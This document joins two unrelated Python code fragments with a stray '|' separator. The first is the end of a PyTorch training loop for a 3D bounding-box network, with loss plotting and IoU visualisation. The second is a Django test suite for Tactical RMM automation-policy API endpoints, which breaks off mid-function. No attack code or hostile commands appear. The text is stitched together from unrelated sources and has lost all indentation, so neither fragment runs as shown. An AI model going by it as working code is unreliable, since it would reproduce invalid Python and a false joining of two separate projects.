pass
classifier = BoxNet(n_classes=num_classes, n_channel=3)
if opt.model != '':
classifier.load_state_dict(torch.load(opt.model))
optimizer = optim.Adam(classifier.parameters(), lr=0.001, betas=(0.9, 0.999),eps=1e-08, weight_decay=0.0)
#scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=20, gamma=0.1)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.1)
#optimizer = optim.Adam(classifier.parameters(), lr=0.001, betas=(0.9, 0.999))
#scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.5)
classifier.cuda()
num_batch = len(box_dataset) / opt.batchSize
plt.ion()
figure = plt.figure()
ax = figure.add_subplot(111)
idx = []
test_loss = []
train_loss = []
plot1, = ax.plot(idx, test_loss, label='test')
plot2, = ax.plot(idx, train_loss, label='train')
plt.ylim(0, 10)
plt.xlim(0, 158200)
plt.xlabel("i")
plt.ylabel("loss")
plt.legend(loc="lower left")
plt.title("loss-iteration")
for epoch in range(opt.nepoch):
scheduler.step()
for i, data in enumerate(box_dataloader, 0):
points, bbox_target, target, _, dist, cluster_center, voxel = data
points1 = points + cluster_center[:, None]
target = target[:, 0]
dist = dist[:, None]
voxel = voxel[:, :, None]
# transform target scalar to 3x one hot vector
hot1 = torch.zeros(len(data[0]))
hot1[target == 0] = 1
hot2 = torch.zeros(len(data[0]))
hot2[target == 2] = 1
hot3 = torch.zeros(len(data[0]))
hot3[target == 1] = 1
one_hot = torch.vstack((hot1, hot2, hot3))
one_hot = one_hot.transpose(1, 0)
points = points.transpose(2, 1)
points, target, bbox_target, one_hot, dist, cluster_center, voxel = points.cuda(), target.cuda(), bbox_target.cuda(), one_hot.cuda(), dist.cuda().float(), cluster_center.cuda(), voxel.cuda().float()
optimizer.zero_grad()
classifier = classifier.train()
# NN
box_pred, center_delta = classifier(points, one_hot, dist, voxel)
center_boxnet, \
heading_scores, heading_residual_normalized, heading_residual, \
size_scores, size_residual_normalized, size_residual = \
parse_output_to_tensors(box_pred)
#box3d_center = center_boxnet + center_delta
stage1_center = cluster_center + center_delta # original cluster center in the world
box3d_center = center_boxnet + stage1_center
# heading_scores (32, 12) which bin is the heading
# heading_residual (32, 12) residual angle
# size_scores (32, 3) which bin is the size
# size_residual (32, 3, 3) residual size
'''
2.Center
center: torch.Size([32, 3]) torch.float32
stage1_center: torch.Size([32, 3]) torch.float32
center_label:[32,3]
3.Heading
heading_scores: torch.Size([32, 12]) torch.float32
heading_residual_normalized: torch.Size([32, 12]) torch.float32
heading_residual: torch.Size([32, 12]) torch.float32
heading_class_label:(32)
heading_residual_label:(32)
4.Size
size_scores: torch.Size([32, 8]) torch.float32
size_residual_normalized: torch.Size([32, 8, 3]) torch.float32
size_residual: torch.Size([32, 8, 3]) torch.float32
size_class_label:(32)
size_residual_label:(32,3)'''
# compute GT
bbox_target[:,:3] = bbox_target[:,:3] + cluster_center
box3d_center_label = bbox_target[:,:3]
angle = bbox_target[:, 6]
heading_class_label, heading_residual_label = angle2class(angle, NUM_HEADING_BIN)
size_class_label, size_residual_label = size2class2(bbox_target[:,3:6], target)
#print(' ')
#print(heading_class_label)
#print(heading_scores.data.max(1)[1])
#print(heading_residual_label)
#print(heading_residual)
#print(size_class_label)
#print(size_scores.data.max(1)[1])
#print(size_residual_label)
#scls_onehot = torch.eye(NUM_SIZE_CLUSTER)[size_class_label.long()].cuda() # 32,8
#scls_onehot_repeat = scls_onehot.view(-1, NUM_SIZE_CLUSTER, 1).repeat(1, 1, 3) # 32,8,3
#predicted_size_residual = torch.sum( \
# size_residual * scls_onehot_repeat.cuda(), dim=1)#32,3
#print(size_residual_label-predicted_size_residual)
#print(size_residual_label-size_residual)
#print(box3d_center_label)
#print(box3d_center)
#print(' ')
# losses
losses = Loss(box3d_center, box3d_center_label, stage1_center, \
heading_scores, heading_residual_normalized, \
heading_residual, \
heading_class_label, heading_residual_label, \
size_scores, size_residual_normalized, \
size_residual, \
size_class_label, size_residual_label)
loss = losses['total_loss']
# accuracy (FIX: flipped box results in IOU = 0 maybe)
ioubev, iou3dbox = compute_box3d_iou(box3d_center.cpu().detach().numpy(), heading_scores.cpu().detach().numpy(), \
heading_residual.cpu().detach().numpy(), size_scores.cpu().detach().numpy(), size_residual.cpu().detach().numpy(), \
box3d_center_label.cpu().detach().numpy(), heading_class_label.cpu().detach().numpy(), \
heading_residual_label.cpu().detach().numpy(), size_class_label.cpu().detach().numpy(), \
size_residual_label.cpu().detach().numpy())
# matplotlib viz
pred_box_corners = give_pred_box_corners(box3d_center.cpu().detach().numpy(), heading_scores.cpu().detach().numpy(), \
heading_residual.cpu().detach().numpy(), size_scores.cpu().detach().numpy(), size_residual.cpu().detach().numpy())
np_bbox_target = bbox_target.cpu().detach().numpy()
gt_corners = boxes_to_corners_3d(np_bbox_target)
if i > 0 and epoch == -1:
for cc in range(32):
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
np_points = points1.cpu().detach().numpy()
pts = np_points[cc]
gt_b = gt_corners[cc] # (8, 3)
b = pred_box_corners[cc]
ax.scatter(pts[:, 0], pts[:, 1], pts[:, 2], s=5, c='b', lw=0, alpha=1)
for k in range(0, 4):
xx = 0
yy = 1
zz = 2
# pred
i, j = k, (k + 1) % 4
ax.plot([b[i, xx], b[j, xx]], [b[i, yy], b[j, yy]], [b[i, zz], b[j, zz]],
color='r')
i, j = k + 4, (k + 1) % 4 + 4
ax.plot([b[i, xx], b[j, xx]], [b[i, yy], b[j, yy]], [b[i, zz], b[j, zz]],
color='r')
i, j = k, k + 4
ax.plot([b[i, xx], b[j, xx]], [b[i, yy], b[j, yy]], [b[i, zz], b[j, zz]],
color='r')
# gt
i, j = k, (k + 1) % 4
ax.plot([gt_b[i, xx], gt_b[j, xx]], [gt_b[i, yy], gt_b[j, yy]], [gt_b[i, zz], gt_b[j, zz]],
color='g')
i, j = k + 4, (k + 1) % 4 + 4
ax.plot([gt_b[i, xx], gt_b[j, xx]], [gt_b[i, yy], gt_b[j, yy]], [gt_b[i, zz], gt_b[j, zz]],
color='g')
i, j = k, k + 4
ax.plot([gt_b[i, xx], gt_b[j, xx]], [gt_b[i, yy], gt_b[j, yy]], [gt_b[i, zz], gt_b[j, zz]],
color='g')
#visual_right_scale(corners3d.reshape(-1, 3), ax)
ax.title.set_text('IOU: {}'.format(iou3dbox[cc]))
ax.view_init(elev=30., azim=-45)
ax.set_box_aspect([1,1,1])
#ax.set_xlim3d(-3, 3)
#ax.set_ylim3d(-3, 3)
#ax.set_zlim3d(-3, 3)
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
plt.show()
'''# Our lines span from points 0 to 1, 1 to 2, 2 to 3, etc...
lines = [[0, 1], [1, 2], [2, 3], [0, 3],
[4, 5], [5, 6], [6, 7], [4, 7],
[0, 4], [1, 5], [2, 6], [3, 7]]
# Use the same color for all lines
colors = [[1, 0, 0] for _ in range(len(lines))]
colors1 = [[0, 1, 0] for _ in range(len(lines))]
line_set = o3d.geometry.LineSet()
line_set.points = o3d.utility.Vector3dVector(np_pred_box[0])
line_set.lines = o3d.utility.Vector2iVector(lines)
line_set.colors = o3d.utility.Vector3dVector(colors)
line_set1 = o3d.geometry.LineSet()
line_set1.points = o3d.utility.Vector3dVector(np_gt_box[0])
line_set1.lines = o3d.utility.Vector2iVector(lines)
line_set1.colors = o3d.utility.Vector3dVector(colors1)
# Create a visualization object and window
#vis = o3d.visualization.Visualizer()
#vis.create_window()
# Display the bounding boxes:
#vis.add_geometry(line_set)
#o3d.visualization.draw_geometries([line_set,line_set1,pcd])
#o3d.visualization.draw_geometries([line_set1])
#np_points = points1.cpu().detach().numpy()
#np_points = np.transpose(np_points)
#pcd = o3d.geometry.PointCloud()
#pcd.points = o3d.utility.Vector3dVector(np_points)
#o3d.visualization.draw_geometries([pcd])
o3d.visualization.draw_geometries([line_set, line_set1])'''
loss.backward()
optimizer.step()
print('[%d: %d/%d] train loss: %f MIOU: %f' % (epoch, i, num_batch, loss.item(), np.mean(iou3dbox)))
#print('[%d: %d/%d] train loss: %f' % (epoch, i, num_batch, loss.item()))
loss_train = loss.item()
if i % 10 == 0:
j, data = next(enumerate(testboxdataloader, 0))
points, bbox_target, target, _, dist, cluster_center, voxel = data
points1 = points + cluster_center[:, None]
target = target[:, 0]
dist = dist[:, None]
voxel = voxel[:, :, None]
# transform target scalar to 3x one hot vector
hot1 = torch.zeros(len(data[0]))
hot1[target == 0] = 1
hot2 = torch.zeros(len(data[0]))
hot2[target == 2] = 1
hot3 = torch.zeros(len(data[0]))
hot3[target == 1] = 1
one_hot = torch.vstack((hot1, hot2, hot3))
one_hot = one_hot.transpose(1, 0)
points = points.transpose(2, 1)
points, target, bbox_target, one_hot, dist, cluster_center, voxel = points.cuda(), target.cuda(), bbox_target.cuda(), one_hot.cuda(), dist.cuda().float(), cluster_center.cuda(), voxel.cuda().float()
classifier = classifier.eval()
# NN
box_pred, center_delta = classifier(points, one_hot, dist, voxel)
center_boxnet, \
heading_scores, heading_residual_normalized, heading_residual, \
size_scores, size_residual_normalized, size_residual = \
parse_output_to_tensors(box_pred)
stage1_center = cluster_center + center_delta # original cluster center in the world
box3d_center = center_boxnet + stage1_center
# compute GT, probably wrong setup
bbox_target[:,:3] = bbox_target[:,:3] + cluster_center
box3d_center_label = bbox_target[:,:3]
angle = bbox_target[:, 6] #+ 3/2*np.pi
heading_class_label, heading_residual_label = angle2class(angle, NUM_HEADING_BIN)
size_class_label, size_residual_label = size2class2(bbox_target[:,3:6], target)
# losses
losses = Loss(box3d_center, box3d_center_label, stage1_center, \
heading_scores, heading_residual_normalized, \
heading_residual, \
heading_class_label, heading_residual_label, \
size_scores, size_residual_normalized, \
size_residual, \
size_class_label, size_residual_label)
loss = losses['total_loss']
# accuracy
ioubev, iou3dbox = compute_box3d_iou(box3d_center.cpu().detach().numpy(), heading_scores.cpu().detach().numpy(), \
heading_residual.cpu().detach().numpy(), size_scores.cpu().detach().numpy(), size_residual.cpu().detach().numpy(), \
box3d_center_label.cpu().detach().numpy(), heading_class_label.cpu().detach().numpy(), \
heading_residual_label.cpu().detach().numpy(), size_class_label.cpu().detach().numpy(), \
size_residual_label.cpu().detach().numpy())
# matplotlib viz
pred_box_corners = give_pred_box_corners(box3d_center.cpu().detach().numpy(), heading_scores.cpu().detach().numpy(), \
heading_residual.cpu().detach().numpy(), size_scores.cpu().detach().numpy(), size_residual.cpu().detach().numpy())
np_bbox_target = bbox_target.cpu().detach().numpy()
gt_corners = boxes_to_corners_3d(np_bbox_target)
if i > 0 and epoch == -1:
for cc in range(32):
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
np_points = points1.cpu().detach().numpy()
pts = np_points[cc]
gt_b = gt_corners[cc] # (8, 3)
b = pred_box_corners[cc]
ax.scatter(pts[:, 0], pts[:, 1], pts[:, 2], s=5, c='b', lw=0, alpha=1)
for k in range(0, 4):
xx = 0
yy = 1
zz = 2
# pred
i, j = k, (k + 1) % 4
ax.plot([b[i, xx], b[j, xx]], [b[i, yy], b[j, yy]], [b[i, zz], b[j, zz]],
color='r')
i, j = k + 4, (k + 1) % 4 + 4
ax.plot([b[i, xx], b[j, xx]], [b[i, yy], b[j, yy]], [b[i, zz], b[j, zz]],
color='r')
i, j = k, k + 4
ax.plot([b[i, xx], b[j, xx]], [b[i, yy], b[j, yy]], [b[i, zz], b[j, zz]],
color='r')
# gt
i, j = k, (k + 1) % 4
ax.plot([gt_b[i, xx], gt_b[j, xx]], [gt_b[i, yy], gt_b[j, yy]], [gt_b[i, zz], gt_b[j, zz]],
color='g')
i, j = k + 4, (k + 1) % 4 + 4
ax.plot([gt_b[i, xx], gt_b[j, xx]], [gt_b[i, yy], gt_b[j, yy]], [gt_b[i, zz], gt_b[j, zz]],
color='g')
i, j = k, k + 4
ax.plot([gt_b[i, xx], gt_b[j, xx]], [gt_b[i, yy], gt_b[j, yy]], [gt_b[i, zz], gt_b[j, zz]],
color='g')
#visual_right_scale(corners3d.reshape(-1, 3), ax)
ax.title.set_text('IOU: {}'.format(iou3dbox[cc]))
ax.view_init(elev=30., azim=-45)
ax.set_box_aspect([1,1,1])
#ax.set_xlim3d(-3, 3)
#ax.set_ylim3d(-3, 3)
#ax.set_zlim3d(-3, 3)
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
plt.show()
print('[%d: %d/%d] %s loss: %f MIOU: %f' % (epoch, i, num_batch, blue('test'), loss.item(), np.mean(iou3dbox)))
test_loss.append(loss.item())
train_loss.append(loss_train)
#loss_list[epoch*791 + i] = loss.item()
idx.append(epoch*791 + i)
plot1.set_xdata(idx)
plot1.set_ydata(test_loss)
plot2.set_xdata(idx)
plot2.set_ydata(train_loss)
figure.canvas.draw()
figure.canvas.flush_events()
time.sleep(0.01)
torch.save(classifier.state_dict(), '%s/cls_model_%d.pth' % (opt.outf, epoch))
'''total_correct = 0
total_testset = 0
for i,data in tqdm(enumerate(testdataloader, 0)):
points, target = data
target = target[:, 0]
points = points.transpose(2, 1)
points, target = points.cuda(), target.cuda()
classifier = classifier.eval()
pred, _, _, _ = classifier(points)
pred_choice = pred.data.max(1)[1]
correct = pred_choice.eq(target.data).cpu().sum()
total_correct += correct.item()
total_testset += points.size()[0]
print("final accuracy {}".format(total_correct / float(total_testset)))''' |
from unittest.mock import patch
from tacticalrmm.test import TacticalTestCase
from model_bakery import baker, seq
from itertools import cycle
from agents.models import Agent
from winupdate.models import WinUpdatePolicy
from .serializers import (
PolicyTableSerializer,
PolicySerializer,
PolicyTaskStatusSerializer,
AutoTaskPolicySerializer,
PolicyOverviewSerializer,
PolicyCheckStatusSerializer,
PolicyCheckSerializer,
RelatedAgentPolicySerializer,
RelatedSitePolicySerializer,
RelatedClientPolicySerializer,
)
class TestPolicyViews(TacticalTestCase):
def setUp(self):
self.authenticate()
self.setup_coresettings()
def test_get_all_policies(self):
url = "/automation/policies/"
policies = baker.make("automation.Policy", _quantity=3)
resp = self.client.get(url, format="json")
serializer = PolicyTableSerializer(policies, many=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.check_not_authenticated("get", url)
def test_get_policy(self):
# returns 404 for invalid policy pk
resp = self.client.get("/automation/policies/500/", format="json")
self.assertEqual(resp.status_code, 404)
policy = baker.make("automation.Policy")
url = f"/automation/policies/{policy.pk}/"
resp = self.client.get(url, format="json")
serializer = PolicySerializer(policy)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.check_not_authenticated("get", url)
def test_add_policy(self):
url = "/automation/policies/"
data = {
"name": "Test Policy",
"desc": "policy desc",
"active": True,
"enforced": False,
}
resp = self.client.post(url, data, format="json")
self.assertEqual(resp.status_code, 200)
# running again should fail since names are unique
resp = self.client.post(url, data, format="json")
self.assertEqual(resp.status_code, 400)
# create policy with tasks and checks
policy = baker.make("automation.Policy")
self.create_checks(policy=policy)
baker.make("autotasks.AutomatedTask", policy=policy, _quantity=3)
# test copy tasks and checks to another policy
data = {
"name": "Test Copy Policy",
"desc": "policy desc",
"active": True,
"enforced": False,
"copyId": policy.pk,
}
resp = self.client.post(f"/automation/policies/", data, format="json")
self.assertEqual(resp.status_code, 200)
self.assertEqual(policy.autotasks.count(), 3)
self.assertEqual(policy.policychecks.count(), 7)
self.check_not_authenticated("post", url)
@patch("automation.tasks.generate_agent_checks_from_policies_task.delay")
def test_update_policy(self, mock_checks_task):
# returns 404 for invalid policy pk
resp = self.client.put("/automation/policies/500/", format="json")
self.assertEqual(resp.status_code, 404)
policy = baker.make("automation.Policy", active=True, enforced=False)
url = f"/automation/policies/{policy.pk}/"
data = {
"name": "Test Policy Update",
"desc": "policy desc Update",
"active": True,
"enforced": False,
}
resp = self.client.put(url, data, format="json")
self.assertEqual(resp.status_code, 200)
# only called if active or enforced are updated
mock_checks_task.assert_not_called()
data = {
"name": "Test Policy Update",
"desc": "policy desc Update",
"active": False,
"enforced": False,
}
resp = self.client.put(url, data, format="json")
self.assertEqual(resp.status_code, 200)
mock_checks_task.assert_called_with(
policypk=policy.pk, clear=True, create_tasks=True
)
self.check_not_authenticated("put", url)
@patch("automation.tasks.generate_agent_checks_from_policies_task.delay")
@patch("automation.tasks.generate_agent_tasks_from_policies_task.delay")
def test_delete_policy(self, mock_tasks_task, mock_checks_task):
# returns 404 for invalid policy pk
resp = self.client.delete("/automation/policies/500/", format="json")
self.assertEqual(resp.status_code, 404)
policy = baker.make("automation.Policy")
url = f"/automation/policies/{policy.pk}/"
resp = self.client.delete(url, format="json")
self.assertEqual(resp.status_code, 200)
mock_checks_task.assert_called_with(policypk=policy.pk, clear=True)
mock_tasks_task.assert_called_with(policypk=policy.pk, clear=True)
self.check_not_authenticated("delete", url)
def test_get_all_policy_tasks(self):
# returns 404 for invalid policy pk
resp = self.client.get("/automation/500/policyautomatedtasks/", format="json")
self.assertEqual(resp.status_code, 404)
# create policy with tasks
policy = baker.make("automation.Policy")
baker.make("autotasks.AutomatedTask", policy=policy, _quantity=3)
url = f"/automation/{policy.pk}/policyautomatedtasks/"
resp = self.client.get(url, format="json")
serializer = AutoTaskPolicySerializer(policy)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.assertEqual(len(resp.data), 3)
self.check_not_authenticated("get", url)
def test_get_all_policy_checks(self):
# setup data
policy = baker.make("automation.Policy")
checks = self.create_checks(policy=policy)
url = f"/automation/{policy.pk}/policychecks/"
resp = self.client.get(url, format="json")
serializer = PolicyCheckSerializer(checks, many=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.assertEqual(len(resp.data), 7)
self.check_not_authenticated("get", url)
def test_get_policy_check_status(self):
# set data
agent = baker.make_recipe("agents.agent")
policy = baker.make("automation.Policy")
policy_diskcheck = baker.make_recipe("checks.diskspace_check", policy=policy)
managed_check = baker.make_recipe(
"checks.diskspace_check",
agent=agent,
managed_by_policy=True,
parent_check=policy_diskcheck.pk,
)
url = f"/automation/policycheckstatus/{policy_diskcheck.pk}/check/"
resp = self.client.patch(url, format="json")
serializer = PolicyCheckStatusSerializer([managed_check], many=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.check_not_authenticated("patch", url)
def test_policy_overview(self):
from clients.models import Client
url = "/automation/policies/overview/"
policies = baker.make(
"automation.Policy", active=cycle([True, False]), _quantity=5
)
clients = baker.make(
"clients.Client",
server_policy=cycle(policies),
workstation_policy=cycle(policies),
_quantity=5,
)
baker.make(
"clients.Site",
client=cycle(clients),
server_policy=cycle(policies),
workstation_policy=cycle(policies),
_quantity=4,
)
baker.make("clients.Site", client=cycle(clients), _quantity=3)
resp = self.client.get(url, format="json")
clients = Client.objects.all()
serializer = PolicyOverviewSerializer(clients, many=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.check_not_authenticated("get", url)
def test_get_related(self):
policy = baker.make("automation.Policy")
url = f"/automation/policies/{policy.pk}/related/"
resp = self.client.get(url, format="json")
self.assertEqual(resp.status_code, 200)
self.assertIsInstance(resp.data["server_clients"], list)
self.assertIsInstance(resp.data["workstation_clients"], list)
self.assertIsInstance(resp.data["server_sites"], list)
self.assertIsInstance(resp.data["workstation_sites"], list)
self.assertIsInstance(resp.data["agents"], list)
self.check_not_authenticated("get", url)
@patch("agents.models.Agent.generate_checks_from_policies")
@patch("automation.tasks.generate_agent_checks_by_location_task.delay")
def test_update_policy_add(
self,
mock_checks_location_task,
mock_checks_task,
):
url = f"/automation/related/"
# data setup
policy = baker.make("automation.Policy")
client = baker.make("clients.Client")
site = baker.make("clients.Site", client=client)
agent = baker.make_recipe("agents.agent", site=site)
# test add client to policy data
client_server_payload = {
"type": "client",
"pk": agent.client.pk,
"server_policy": policy.pk,
}
client_workstation_payload = {
"type": "client",
"pk": agent.client.pk,
"workstation_policy": policy.pk,
}
# test add site to policy data
site_server_payload = {
"type": "site",
"pk": agent.site.pk,
"server_policy": policy.pk,
}
site_workstation_payload = {
"type": "site",
"pk": agent.site.pk,
"workstation_policy": policy.pk,
}
# test add agent to policy data
agent_payload = {"type": "agent", "pk": agent.pk, "policy": policy.pk}
# test client server policy add
resp = self.client.post(url, client_server_payload, format="json")
self.assertEqual(resp.status_code, 200)
# called because the relation changed
mock_checks_location_task.assert_called_with(
location={"site__client_id": client.id},
mon_type="server",
clear=True,
create_tasks=True,
)
mock_checks_location_task.reset_mock()
# test client workstation policy add
resp = self.client.post(url, client_workstation_payload, format="json")
self.assertEqual(resp.status_code, 200)
# called because the relation changed
mock_checks_location_task.assert_called_with(
location={"site__client_id": client.id},
mon_type="workstation",
clear=True,
create_tasks=True,
)
mock_checks_location_task.reset_mock()
# test site add server policy
resp = self.client.post(url, site_server_payload, format="json")
self.assertEqual(resp.status_code, 200)
# called because the relation changed
mock_checks_location_task.assert_called_with(
location={"site_id": site.id},
mon_type="server",
clear=True,
create_tasks=True,
)
mock_checks_location_task.reset_mock()
# test site add workstation policy
resp = self.client.post(url, site_workstation_payload, format="json")
self.assertEqual(resp.status_code, 200)
# called because the relation changed
mock_checks_location_task.assert_called_with(
location={"site_id": site.id},
mon_type="workstation",
clear=True,
create_tasks=True,
)
mock_checks_location_task.reset_mock()
# test agent add
resp = self.client.post(url, agent_payload, format="json")
self.assertEqual(resp.status_code, 200)
# called because the relation changed
mock_checks_task.assert_called_with(clear=True)
mock_checks_task.reset_mock()
# Adding the same relations shouldn't trigger mocks
resp = self.client.post(url, client_server_payload, format="json")
self.assertEqual(resp.status_code, 200)
resp = self.client.post(url, client_workstation_payload, format="json")
self.assertEqual(resp.status_code, 200)
mock_checks_location_task.assert_not_called()
resp = self.client.post(url, site_server_payload, format="json")
self.assertEqual(resp.status_code, 200)
resp = self.client.post(url, site_workstation_payload, format="json")
self.assertEqual(resp.status_code, 200)
mock_checks_location_task.assert_not_called()
resp = self.client.post(url, agent_payload, format="json")
self.assertEqual(resp.status_code, 200)
# called because the relation changed
mock_checks_task.assert_not_called()
# test remove client from policy data
client_server_payload = {"type": "client", "pk": client.pk, "server_policy": 0}
client_workstation_payload = {
"type": "client",
"pk": client.pk,
"workstation_policy": 0,
}
# test remove site from policy data
site_server_payload = {"type": "site", "pk": site.pk, "server_policy": 0}
site_workstation_payload = {
"type": "site",
"pk": site.pk,
"workstation_policy": 0,
}
# test remove agent from policy
agent_payload = {"type": "agent", "pk": agent.pk, "policy": 0}
# test client server policy remove
resp = self.client.post(url, client_server_payload, format="json")
self.assertEqual(resp.status_code, 200)
# called because the relation changed
mock_checks_location_task.assert_called_with(
location={"site__client_id": client.id},
mon_type="server",
clear=True,
create_tasks=True,
)
mock_checks_location_task.reset_mock()
# test client workstation policy remove
resp = self.client.post(url, client_workstation_payload, format="json")
self.assertEqual(resp.status_code, 200)
# called because the relation changed
mock_checks_location_task.assert_called_with(
location={"site__client_id": client.id},
mon_type="workstation",
clear=True,
create_tasks=True,
)
mock_checks_location_task.reset_mock()
# test site remove server policy
resp = self.client.post(url, site_server_payload, format="json")
self.assertEqual(resp.status_code, 200)
# called because the relation changed
mock_checks_location_task.assert_called_with(
location={"site_id": site.id},
mon_type="server",
clear=True,
create_tasks=True,
)
mock_checks_location_task.reset_mock()
# test site remove workstation policy
resp = self.client.post(url, site_workstation_payload, format="json")
self.assertEqual(resp.status_code, 200)
# called because the relation changed
mock_checks_location_task.assert_called_with(
location={"site_id": site.id},
mon_type="workstation",
clear=True,
create_tasks=True,
)
mock_checks_location_task.reset_mock()
# test agent remove
resp = self.client.post(url, agent_payload, format="json")
self.assertEqual(resp.status_code, 200)
# called because the relation changed
mock_checks_task.assert_called_with(clear=True)
mock_checks_task.reset_mock()
# adding the same relations shouldn't trigger mocks
resp = self.client.post(url, client_server_payload, format="json")
self.assertEqual(resp.status_code, 200)
resp = self.client.post(url, client_workstation_payload, format="json")
self.assertEqual(resp.status_code, 200)
# shouldn't be called since nothing changed
mock_checks_location_task.assert_not_called()
resp = self.client.post(url, site_server_payload, format="json")
self.assertEqual(resp.status_code, 200)
resp = self.client.post(url, site_workstation_payload, format="json")
self.assertEqual(resp.status_code, 200)
# shouldn't be called since nothing changed
mock_checks_location_task.assert_not_called()
resp = self.client.post(url, agent_payload, format="json")
self.assertEqual(resp.status_code, 200)
# shouldn't be called since nothing changed
mock_checks_task.assert_not_called()
self.check_not_authenticated("post", url)
def test_get_relation_by_type(self):
url = f"/automation/related/"
# data setup
policy = baker.make("automation.Policy")
client = baker.make("clients.Client", workstation_policy=policy)
site = baker.make("clients.Site", server_policy=policy)
agent = baker.make_recipe("agents.agent", site=site, policy=policy)
client_payload = {"type": "client", "pk": client.pk}
# test add site to policy
site_payload = {"type": "site", "pk": site.pk}
# test add agent to policy
agent_payload = {"type": "agent", "pk": agent.pk}
# test client relation get
serializer = RelatedClientPolicySerializer(client)
resp = self.client.patch(url, client_payload, format="json")
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
# test site relation get
serializer = RelatedSitePolicySerializer(site)
resp = self.client.patch(url, site_payload, format="json")
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
# test agent relation get
serializer = RelatedAgentPolicySerializer(agent)
resp = self.client.patch(url, agent_payload, format="json")
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
invalid_payload = {"type": "bad_type", "pk": 5}
resp = self.client.patch(url, invalid_payload, format="json")
self.assertEqual(resp.status_code, 400)
self.check_not_authenticated("patch", url)
def test_get_policy_task_status(self):
# policy with a task
policy = baker.make("automation.Policy")
task = baker.make("autotasks.AutomatedTask", policy=policy)
# create policy managed tasks
policy_tasks = baker.make(
"autotasks.AutomatedTask", parent_task=task.id, _quantity=5
)
url = f"/automation/policyautomatedtaskstatus/{task.id}/task/"
serializer = PolicyTaskStatusSerializer(policy_tasks, many=True)
resp = self.client.patch(url, format="json")
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.assertEqual(len(resp.data), 5)
self.check_not_authenticated("patch", url)
@patch("automation.tasks.run_win_policy_autotask_task.delay")
def test_run_win_task(self, mock_task):
# create managed policy tasks
tasks = baker.make(
"autotasks.AutomatedTask",
managed_by_policy=True,
parent_task=1,
_quantity=6,
)
url = "/automation/runwintask/1/"
resp = self.client.put(url, format="json")
self.assertEqual(resp.status_code, 200)
mock_task.assert_called_once_with([task.pk for task in tasks])
self.check_not_authenticated("put", url)
def test_create_new_patch_policy(self):
url = "/automation/winupdatepolicy/"
# test policy doesn't exist
data = {"policy": 500}
resp = self.client.post(url, data, format="json")
self.assertEqual(resp.status_code, 404)
policy = baker.make("automation.Policy")
data = {
"policy": policy.pk,
"critical": "approve",
"important": "approve",
"moderate": "ignore",
"low": "ignore",
"other": "approve",
"run_time_hour": 3,
"run_time_frequency": "daily",
"run_time_days": [0, 3, 5],
"run_time_day": "15",
"reboot_after_install": "always",
}
resp = self.client.post(url, data, format="json")
self.assertEqual(resp.status_code, 200)
self.check_not_authenticated("post", url)
def test_update_patch_policy(self):
# test policy doesn't exist
resp = self.client.put("/automation/winupdatepolicy/500/", format="json")
self.assertEqual(resp.status_code, 404)
policy = baker.make("automation.Policy")
patch_policy = baker.make("winupdate.WinUpdatePolicy", policy=policy)
url = f"/automation/winupdatepolicy/{patch_policy.pk}/"
data = {
"id": patch_policy.pk,
"policy": policy.pk,
"critical": "approve",
"important": "approve",
"moderate": "ignore",
"low": "ignore",
"other": "approve",
"run_time_days": [4, 5, 6],
}
resp = self.client.put(url, data, format="json")
self.assertEqual(resp.status_code, 200)
self.check_not_authenticated("put", url)
def test_reset_patch_policy(self):
url = "/automation/winupdatepolicy/reset/"
inherit_fields = {
"critical": "inherit",
"important": "inherit",
"moderate": "inherit",
"low": "inherit",
"other": "inherit",
"run_time_frequency": "inherit",
"reboot_after_install": "inherit",
"reprocess_failed_inherit": True,
}
clients = baker.make("clients.Client", _quantity=6)
sites = baker.make("clients.Site", client=cycle(clients), _quantity=10)
agents = baker.make_recipe(
"agents.agent",
site=cycle(sites),
_quantity=6,
)
# create patch policies
baker.make_recipe(
"winupdate.winupdate_approve", agent=cycle(agents), _quantity=6
)
# test reset agents in site
data = {"site": sites[0].id}
resp = self.client.patch(url, data, format="json")
self.assertEqual(resp.status_code, 200)
agents = Agent.objects.filter(site=sites[0])
for agent in agents:
for k, v in inherit_fields.items():
self.assertEqual(getattr(agent.winupdatepolicy.get(), k), v)
# test reset agents in client
data = {"client": clients[1].id}
resp = self.client.patch(url, data, format="json")
self.assertEqual(resp.status_code, 200)
agents = Agent.objects.filter(site__client=clients[1])
for agent in agents:
for k, v in inherit_fields.items():
self.assertEqual(getattr(agent.winupdatepolicy.get(), k), v)
# test reset all agents
data = {}
resp = self.client.patch(url, data, format="json")
self.assertEqual(resp.status_code, 200)
agents = Agent.objects.all()
for agent in agents:
for k, v in inherit_fields.items():
self.assertEqual(getattr(agent.winupdatepolicy.get(), k), v)
self.check_not_authenticated("patch", url)
def test_delete_patch_policy(self):
# test patch policy doesn't exist
resp = self.client.delete("/automation/winupdatepolicy/500/", format="json")
self.assertEqual(resp.status_code, 404)
winupdate_policy = baker.make_recipe(
"winupdate.winupdate_policy", policy__name="Test Policy"
)
url = f"/automation/winupdatepolicy/{winupdate_policy.pk}/"
resp = self.client.delete(url, format="json")
self.assertEqual(resp.status_code, 200)
self.assertFalse(
WinUpdatePolicy.objects.filter(pk=winupdate_policy.pk).exists()
)
self.check_not_authenticated("delete", url)
class TestPolicyTasks(TacticalTestCase):
def setUp(self):
self.authenticate()
self.setup_coresettings()
def test_policy_related(self):
# Get Site and Client from an agent in list
